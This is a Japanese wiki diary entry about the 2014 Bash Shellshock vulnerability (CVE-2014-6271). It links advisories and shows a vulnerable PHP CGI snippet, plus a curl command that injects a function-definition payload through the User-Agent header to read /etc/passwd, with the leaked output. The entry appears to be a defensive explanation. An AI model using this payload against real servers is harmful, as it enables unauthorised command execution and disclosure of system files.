内容へ移動
fl8 Wiki
ユーザ用ツール
ログイン
サイト用ツール
検索
ツール
文書の表示
以前のリビジョン
バックリンク
最近の変更
メディアマネージャー
サイトマップ
ログイン
>
最近の変更
メディアマネージャー
サイトマップ
現在位置:
Dokuwiki.fl8.jp
»
50 日記
»
2014
»
09
»
2014.09.25 Bash脆弱性
トレース:
50_dialy:2014:09:25
この文書は読取専用です。文書のソースを閲覧することは可能ですが、変更はできません。もし変更したい場合は管理者に連絡してください。
====== 2014.09.25 Bash脆弱性 ====== [[https://support.clara.jp/news/20140925_bash_update.htm]] [[http://www.walbrix.com/jp/blog/2014-09-bash-code-injection.html]] [[https://access.redhat.com/security/cve/CVE-2014-6271]] <color red>**※CGI本体をシェルスクリプトで書いていなくても、シェルを使って外部コマンドを呼び出しているだけで影響有り**</color> 下記のスクリプトをCGIモードで動かしている場合、影響有りです。 <code php> <?php echo 'AAAA'; exec('df -h',$array); foreach($array as $v){ echo $v."\n"; } ?> </code> ===== 以下実行例 ===== <code console> curl -A "() { :;}; echo Content-type:text/plain;echo;/bin/cat /etc/passwd" http://fl8.jp/test.php AAAAContent-type:text/plain root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin ・ ・ ・ ・ </code> {{tag>日記 Security}}
50_dialy/2014/09/25.txt
· 最終更新: 2017/11/08 01:18 by
matsui
ページ用ツール
文書の表示
以前のリビジョン
バックリンク
文書の先頭へ